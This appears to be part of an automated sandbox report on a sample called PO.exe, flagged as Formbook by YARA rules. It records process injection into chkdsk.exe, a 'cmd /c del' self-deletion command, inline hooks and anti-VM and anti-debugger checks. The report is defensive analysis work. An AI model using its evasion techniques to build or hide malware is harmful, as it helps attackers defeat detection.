          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29560 NtWriteFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A296D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49E90 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49E10 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49DB3 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49E8A NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49F3B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00401027
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E100
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E246
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041DF12
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041DF1C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB090
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1002
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EF900
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1EBB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F841F
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FD5E0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E0D20
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB1D55
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A06E30
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00401027
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_0041E100
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_0041E246
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B32D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B39E3C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B39E40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B32FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4DF12
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4DF1C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4E100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4E246
          Source: C:\Users\user\Desktop\PO.exeCode function: String function: 009EB150 appears 35 times
          Source: PO.exe, 00000000.00000003.233217726.000000001F0EF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000002.281671216.0000000000ADF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000002.282165146.0000000002656000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs PO.exe
          Source: PO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@4/2
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
          Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsj9DD.tmpJump to behavior
          Source: PO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO.exeVirustotal: Detection: 15%
          Source: PO.exeReversingLabs: Detection: 14%
          Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\user\Desktop\PO.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: C:\xampp\htdocs\Cryptor\a3aea962689945e0b965ec319b5ccdaa\Loader\Loader\Release\16znhx5gg.pdb source: PO.exe, 00000000.00000002.240861204.0000000073CA2000.00000002.00020000.sdmp, gif000d.dll.0.dr
          Source: Binary string: chkdsk.pdbGCTL source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: chkdsk.pdb source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.232569339.000000001EFD0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.281671216.0000000000ADF000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO.exe, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PO.exeUnpacked PE file: 1.2.PO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E34F push eax; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00417CCE push 7FCF5E29h; iretd
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00417CD7 push ebx; retf
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004164B4 push esi; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00417D58 push esp; iretd
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_0041E34F push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B464B4 push esi; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B47CD7 push ebx; retf
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B47CCE push 7FCF5E29h; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B47D58 push esp; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4CF02 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4CF0B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4CF6C push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4E34F push eax; ret
          Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEF
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004B398E4 second address: 0000000004B398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004B39B5E second address: 0000000004B39B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 3868Thread sleep count: 33 > 30
          Source: C:\Windows\explorer.exe TID: 3868Thread sleep time: -66000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4740Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.260637571.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.242011402.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.242372336.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.239700502.000000000113D000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000002.00000000.239807518.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.262044821.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000002.508445429.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.262044821.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0255165D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_02551875 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]
